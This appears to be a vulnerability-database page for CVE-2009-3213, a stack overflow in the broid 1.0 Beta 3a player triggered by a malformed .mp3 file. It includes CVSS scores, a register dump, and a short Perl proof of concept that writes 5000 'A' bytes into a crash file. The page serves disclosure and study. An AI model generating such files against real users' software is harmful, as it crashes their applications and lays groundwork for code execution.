broid 1.0 Beta 3a (.mp3 File) Local Stack Overflow PoC

2009-09-17 / 2009-09-18
Credit: HACK4LOVE
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-3213
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl # Found By :: HACK4LOVE # broid 1.0 Beta 3a (.mp3 File) Local Stack Overflow PoC # http://s1.freedownloadsplace.com/download-soft1/broid-1.0-Beta-3a.zip ######################################################################################## ##EAX 8C8C8C7D ##ECX 41414141 ##EDX C3C3C3C3 ##EBX 00FE28B8 ASCII "C:\Documents and Settings\ahmed\Desktop\hack4love.mp3" ##ESP 0012EF74 ##EBP 00FFE128 ##ESI 00001388 ##EDI 41414141 ##EIP 004784FF broidegn.004784FF ####################################################################################### #Thanks*SimO-s0fT /\RAYO/\deco017/\mo7areb/\ELNAMER ELMASRY/\EL7ADRANY/\SKULL-HACKER # Stack/\His0k4/\ThE g0bL!N/\ZAX/\ASER ELRO7/\SAR7ABEL ELSAFA7 ######################################################################################## my $crash="\x41" x 5000; open(myfile,'>>hack4love.mp3'); print myfile $crash; ########################################################################################

References:

http://xforce.iss.net/xforce/xfdb/52532
http://packetstormsecurity.org/0908-exploits/broid-overflow.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top